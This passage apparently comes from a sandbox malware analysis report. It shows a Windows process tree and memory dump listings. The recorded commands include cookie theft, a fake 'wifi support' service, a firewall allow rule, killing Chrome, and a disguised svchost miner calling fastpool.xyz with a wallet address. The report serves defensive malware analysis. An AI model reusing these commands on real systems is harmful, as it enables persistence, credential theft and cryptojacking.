                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                                                                                                                              11⤵
                                                                                                                                                                PID:6172
                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\4845452.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\4845452.exe"
                                                                                                                                                              10⤵
                                                                                                                                                                PID:1696
                                                                                                                                                            • C:\Program Files (x86)\Data Finder\Versium Research\hjjgaa.exe
                                                                                                                                                              "C:\Program Files (x86)\Data Finder\Versium Research\hjjgaa.exe"
                                                                                                                                                              9⤵
                                                                                                                                                                PID:5036
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                  10⤵
                                                                                                                                                                    PID:6120
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                    10⤵
                                                                                                                                                                      PID:6212
                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pi3kfrcx.32y\google-game.exe & exit
                                                                                                                                                            5⤵
                                                                                                                                                              PID:5100
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\pi3kfrcx.32y\google-game.exe
                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\pi3kfrcx.32y\google-game.exe
                                                                                                                                                                6⤵
                                                                                                                                                                  PID:4524
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\pi3kfrcx.32y\google-game.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\pi3kfrcx.32y\google-game.exe" -a
                                                                                                                                                                    7⤵
                                                                                                                                                                      PID:4740
                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4n2cwhmc.0fg\BrowzarBrowser_J013.exe & exit
                                                                                                                                                                  5⤵
                                                                                                                                                                    PID:4568
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\4n2cwhmc.0fg\BrowzarBrowser_J013.exe
                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\4n2cwhmc.0fg\BrowzarBrowser_J013.exe
                                                                                                                                                                      6⤵
                                                                                                                                                                        PID:1336
                                                                                                                                                                        • C:\Program Files (x86)\Browzar\MrGh6bEH0L0a.exe
                                                                                                                                                                          "C:\Program Files (x86)\Browzar\MrGh6bEH0L0a.exe"
                                                                                                                                                                          7⤵
                                                                                                                                                                            PID:4084
                                                                                                                                                                            • C:\Program Files (x86)\Browzar\MrGh6bEH0L0a.exe
                                                                                                                                                                              "C:\Program Files (x86)\Browzar\MrGh6bEH0L0a.exe"
                                                                                                                                                                              8⤵
                                                                                                                                                                                PID:6224
                                                                                                                                                                            • C:\Program Files (x86)\Browzar\Browzar.exe
                                                                                                                                                                              "C:\Program Files (x86)\Browzar\Browzar.exe"
                                                                                                                                                                              7⤵
                                                                                                                                                                                PID:3776
                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kuqgqwgb.jgu\GcleanerWW.exe /mixone & exit
                                                                                                                                                                            5⤵
                                                                                                                                                                              PID:304
                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ufohg1qd.wta\toolspab1.exe & exit
                                                                                                                                                                              5⤵
                                                                                                                                                                                PID:4996
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\ufohg1qd.wta\toolspab1.exe
                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\ufohg1qd.wta\toolspab1.exe
                                                                                                                                                                                  6⤵
                                                                                                                                                                                    PID:4572
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\ufohg1qd.wta\toolspab1.exe
                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\ufohg1qd.wta\toolspab1.exe
                                                                                                                                                                                      7⤵
                                                                                                                                                                                        PID:5484
                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\h0lwrwrp.xrw\SunLabsPlayer.exe /S & exit
                                                                                                                                                                                    5⤵
                                                                                                                                                                                      PID:5984
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\h0lwrwrp.xrw\SunLabsPlayer.exe
                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\h0lwrwrp.xrw\SunLabsPlayer.exe /S
                                                                                                                                                                                        6⤵
                                                                                                                                                                                          PID:5256
                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nszC0F.tmp\tempfile.ps1"
                                                                                                                                                                                            7⤵
                                                                                                                                                                                              PID:7124
                                                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nszC0F.tmp\tempfile.ps1"
                                                                                                                                                                                              7⤵
                                                                                                                                                                                                PID:5920
                                                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nszC0F.tmp\tempfile.ps1"
                                                                                                                                                                                                7⤵
                                                                                                                                                                                                  PID:224
                                                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nszC0F.tmp\tempfile.ps1"
                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                    PID:5432
                                                                                                                                                                                                  • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                                                                                                                                                    "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                      PID:5140
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\2F48.exe
                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\2F48.exe
                                                                                                                                                                                          1⤵
                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                          PID:3548
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\32F2.exe
                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\32F2.exe
                                                                                                                                                                                          1⤵
                                                                                                                                                                                            PID:3792
                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\kwnbpfqc\
                                                                                                                                                                                              2⤵
                                                                                                                                                                                                PID:4876
                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\poovmilm.exe" C:\Windows\SysWOW64\kwnbpfqc\
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                  PID:4968
                                                                                                                                                                                                • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                  "C:\Windows\System32\sc.exe" create kwnbpfqc binPath= "C:\Windows\SysWOW64\kwnbpfqc\poovmilm.exe /d\"C:\Users\Admin\AppData\Local\Temp\32F2.exe\"" type= own start= auto DisplayName= "wifi support"
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                    PID:5080
                                                                                                                                                                                                  • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                    "C:\Windows\System32\sc.exe" description kwnbpfqc "wifi internet conection"
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                      PID:3788
                                                                                                                                                                                                    • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                      "C:\Windows\System32\sc.exe" start kwnbpfqc
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                        PID:4312
                                                                                                                                                                                                      • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                        "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                          PID:4500
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\3D44.exe
                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\3D44.exe
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                          PID:3776
                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                            cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                              PID:3820
                                                                                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                taskkill /f /im chrome.exe
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                                                                PID:4304
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\4A16.exe
                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\4A16.exe
                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                              PID:3956
                                                                                                                                                                                                            • C:\Windows\SysWOW64\kwnbpfqc\poovmilm.exe
                                                                                                                                                                                                              C:\Windows\SysWOW64\kwnbpfqc\poovmilm.exe /d"C:\Users\Admin\AppData\Local\Temp\32F2.exe"
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                PID:3772
                                                                                                                                                                                                                • C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                  svchost.exe
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                    PID:5316
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                      svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                        PID:6548
                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                      PID:4200
                                                                                                                                                                                                                    • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                      C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                        PID:2736
                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                          PID:2244
                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                            PID:5440
                                                                                                                                                                                                                            • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                              C:\Windows\system32\WerFault.exe -u -p 5440 -s 2808
                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                              • Program crash
                                                                                                                                                                                                                              PID:6352
                                                                                                                                                                                                                          • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                                                                                                                            rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                                                            PID:5684
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                              rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                PID:5708
                                                                                                                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                              C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                PID:5808
                                                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                  PID:6036
                                                                                                                                                                                                                                • C:\Windows\system32\werfault.exe
                                                                                                                                                                                                                                  werfault.exe /h /shared Global\5d6263ddfded48b08a6d16ae865c9794 /t 0 /p 6036
                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                    PID:6484
                                                                                                                                                                                                                                  • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                                                                                                                                    rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                                                                                                                    PID:6900
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                      rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                        PID:6924
                                                                                                                                                                                                                                    • C:\Windows\system32\LogonUI.exe
                                                                                                                                                                                                                                      "LogonUI.exe" /flags:0x0 /state0:0xa3ae4055 /state1:0x41c64e6d
                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                        PID:5208
                                                                                                                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                        C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                          PID:4592
                                                                                                                                                                                                                                        • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                          C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                            PID:5784
                                                                                                                                                                                                                                          • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                            C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                              PID:6552
                                                                                                                                                                                                                                            • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                              C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                PID:4268
                                                                                                                                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                  PID:5868
                                                                                                                                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                  C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                    PID:6700
                                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                      PID:4468
                                                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                        PID:4776
                                                                                                                                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                        C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                          PID:4496
                                                                                                                                                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                          C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                            PID:6748

                                                                                                                                                                                                                                                          Network

                                                                                                                                                                                                                                                          MITRE ATT&CK Enterprise v6

                                                                                                                                                                                                                                                          Replay Monitor

                                                                                                                                                                                                                                                          Loading Replay Monitor...

                                                                                                                                                                                                                                                          Downloads

                                                                                                                                                                                                                                                          • memory/364-213-0x0000000000C10000-0x0000000000C19000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            36KB

                                                                                                                                                                                                                                                            Download

                                                                                                                                                                                                                                                          • memory/364-209-0x0000000000C20000-0x0000000000C25000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            20KB

                                                                                                                                                                                                                                                            Download

                                                                                                                                                                                                                                                          • memory/652-193-0x0000000000B40000-0x0000000000B45000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            20KB

                                                                                                                                                                                                                                                            Download

                                                                                                                                                                                                                                                          • memory/652-194-0x0000000000B30000-0x0000000000B39000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            36KB

                                                                                                                                                                                                                                                            Download

                                                                                                                                                                                                                                                          • memory/812-285-0x00000000021D0000-0x00000000022EB000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            1.1MB

                                                                                                                                                                                                                                                            Download

                                                                                                                                                                                                                                                          • memory/1200-212-0x00000000003A0000-0x00000000003A5000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            20KB

                                                                                                                                                                                                                                                            Download

                                                                                                                                                                                                                                                          • memory/1200-215-0x0000000000390000-0x0000000000399000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            36KB

                                                                                                                                                                                                                                                            Download

                                                                                                                                                                                                                                                          • memory/1276-300-0x0000000000400000-0x0000000000537000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            1.2MB

                                                                                                                                                                                                                                                            Download

                                                                                                                                                                                                                                                          • memory/1276-284-0x0000000000400000-0x0000000000537000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            1.2MB

                                                                                                                                                                                                                                                            Download

                                                                                                                                                                                                                                                          • memory/1464-180-0x0000000000AA0000-0x0000000000AAF000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            60KB

                                                                                                                                                                                                                                                            Download

                                                                                                                                                                                                                                                          • memory/1464-178-0x0000000000AB0000-0x0000000000AB9000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            36KB

                                                                                                                                                                                                                                                            Download

                                                                                                                                                                                                                                                          • memory/1772-273-0x00000000001E0000-0x00000000001E1000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                            Download

                                                                                                                                                                                                                                                          • memory/2120-164-0x0000000005070000-0x0000000005676000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            6.0MB

                                                                                                                                                                                                                                                            Download

                                                                                                                                                                                                                                                          • memory/2120-161-0x0000000005150000-0x0000000005151000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                            Download

                                                                                                                                                                                                                                                          • memory/2120-223-0x0000000006B50000-0x0000000006B51000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                            Download

                                                                                                                                                                                                                                                          • memory/2120-160-0x00000000050F0000-0x00000000050F1000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                            Download

                                                                                                                                                                                                                                                          • memory/2120-162-0x0000000005190000-0x0000000005191000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                            Download

                                                                                                                                                                                                                                                          • memory/2120-159-0x0000000005680000-0x0000000005681000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                            Download

                                                                                                                                                                                                                                                          • memory/2120-208-0x0000000006670000-0x0000000006671000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                            Download

                                                                                                                                                                                                                                                          • memory/2120-210-0x0000000006D70000-0x0000000006D71000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                            Download

                                                                                                                                                                                                                                                          • memory/2120-168-0x0000000005400000-0x0000000005401000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                            Download

                                                                                                                                                                                                                                                          • memory/2120-216-0x0000000006840000-0x0000000006841000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                            Download

                                                                                                                                                                                                                                                          • memory/2120-151-0x0000000000400000-0x000000000041E000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            120KB

                                                                                                                                                                                                                                                            Download

                                                                                                                                                                                                                                                          • memory/2184-239-0x0000000004B53000-0x0000000004B54000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                            Download

                                                                                                                                                                                                                                                          • memory/2184-240-0x0000000004B54000-0x0000000004B56000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            8KB

                                                                                                                                                                                                                                                            Download

                                                                                                                                                                                                                                                          • memory/2184-238-0x0000000004B52000-0x0000000004B53000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                            Download

                                                                                                                                                                                                                                                          • memory/2184-237-0x0000000004B50000-0x0000000004B51000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                            Download

                                                                                                                                                                                                                                                          • memory/2184-236-0x0000000000400000-0x000000000046F000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            444KB

                                                                                                                                                                                                                                                            Download

                                                                                                                                                                                                                                                          • memory/2184-235-0x0000000001F60000-0x0000000001F8F000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            188KB

                                                                                                                                                                                                                                                            Download

                                                                                                                                                                                                                                                          • memory/2228-204-0x0000000000500000-0x0000000000509000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            36KB

                                                                                                                                                                                                                                                            Download

                                                                                                                                                                                                                                                          • memory/2228-203-0x0000000000510000-0x0000000000514000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            16KB

                                                                                                                                                                                                                                                            Download

                                                                                                                                                                                                                                                          • memory/2380-330-0x0000000004830000-0x0000000004838000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            32KB

                                                                                                                                                                                                                                                            Download

                                                                                                                                                                                                                                                          • memory/2380-258-0x0000000000400000-0x0000000000664000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            2.4MB

                                                                                                                                                                                                                                                            Download

                                                                                                                                                                                                                                                          • memory/2380-317-0x0000000003480000-0x0000000003490000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            64KB

                                                                                                                                                                                                                                                            Download

                                                                                                                                                                                                                                                          • memory/2380-323-0x0000000003620000-0x0000000003630000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            64KB

                                                                                                                                                                                                                                                            Download

                                                                                                                                                                                                                                                          • memory/2396-226-0x0000000000460000-0x000000000050E000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            696KB

                                                                                                                                                                                                                                                            Download

                                                                                                                                                                                                                                                          • memory/2396-227-0x0000000000400000-0x0000000000457000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            348KB

                                                                                                                                                                                                                                                            Download

                                                                                                                                                                                                                                                          • memory/2616-174-0x0000000000760000-0x000000000076C000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            48KB

                                                                                                                                                                                                                                                            Download

                                                                                                                                                                                                                                                          • memory/2616-172-0x0000000000770000-0x0000000000777000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            28KB

                                                                                                                                                                                                                                                            Download

                                                                                                                                                                                                                                                          • memory/2676-200-0x0000000000BC0000-0x0000000000BC6000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            24KB

                                                                                                                                                                                                                                                            Download

                                                                                                                                                                                                                                                          • memory/2676-201-0x0000000000BB0000-0x0000000000BBC000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            48KB

                                                                                                                                                                                                                                                            Download

                                                                                                                                                                                                                                                          • memory/2688-266-0x0000000000400000-0x0000000000420000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            128KB

                                                                                                                                                                                                                                                            Download

                                                                                                                                                                                                                                                          • memory/2776-283-0x0000000000400000-0x00000000004AD000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            692KB

                                                                                                                                                                                                                                                            Download

                                                                                                                                                                                                                                                          • memory/2776-280-0x0000000000530000-0x00000000005DE000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            696KB

                                                                                                                                                                                                                                                            Download

                                                                                                                                                                                                                                                          • memory/2968-169-0x0000000000180000-0x00000000001F4000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            464KB

                                                                                                                                                                                                                                                            Download

                                                                                                                                                                                                                                                          • memory/2968-170-0x0000000000110000-0x000000000017B000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            428KB

                                                                                                                                                                                                                                                            Download

                                                                                                                                                                                                                                                          • memory/3020-119-0x00000000010E0000-0x00000000010F7000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            92KB

                                                                                                                                                                                                                                                            Download

                                                                                                                                                                                                                                                          • memory/3020-243-0x0000000003080000-0x0000000003096000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            88KB

                                                                                                                                                                                                                                                            Download

                                                                                                                                                                                                                                                          • memory/3036-184-0x0000000004C80000-0x0000000004C81000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                            Download

                                                                                                                                                                                                                                                          • memory/3036-183-0x0000000004C70000-0x0000000004C71000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                            Download

                                                                                                                                                                                                                                                          • memory/3036-189-0x0000000004C73000-0x0000000004C74000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                            Download

                                                                                                                                                                                                                                                          • memory/3036-179-0x0000000000470000-0x00000000005BA000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            1.3MB

                                                                                                                                                                                                                                                            Download

